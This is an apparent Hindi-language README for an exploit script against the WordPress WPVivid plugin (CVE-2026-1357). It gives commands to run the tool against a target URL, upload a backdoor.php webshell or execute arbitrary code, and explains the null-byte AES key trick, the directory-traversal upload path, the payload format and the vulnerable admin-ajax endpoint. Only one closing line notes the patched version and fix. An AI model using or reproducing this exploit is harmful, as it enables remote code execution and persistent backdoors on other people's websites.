
CVE-2026-1357 के लिए एक्सप्लॉइट WordPress WPVivid प्लगइन में, जो क्राफ्टेड AES-एन्क्रिप्टेड पेलोड और डायरेक्टरी ट्रैवर्सल के माध्यम से वेबशेल अपलोड करने के लिए रिमोट कोड एक्ज़ीक्यूशन सक्षम करता है।
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" तकनीकी व्याख्या: Null Byte Key: जब RSA decrypt विफल होता है, तो false लौटाता है, जिसे phpseclib "\x00\x00\x00" के रूप में मानता है। हम AES-128 ECB कुंजी के रूप में 16 null bytes का उपयोग करते हैं। Directory Traversal: Filename को sanitize नहीं किया जाता, जिससे ../../../../wp-content/uploads/shell.php की अनुमति मिलती है Payload Format:
[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] निष्पादन: POST /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site पर भेजें wpvivid_content = base64(एन्क्रिप्टेड payload) पहचान और शमन:
0.9.124 में पैच किया गया:
if ($key === false || empty($key)) return false;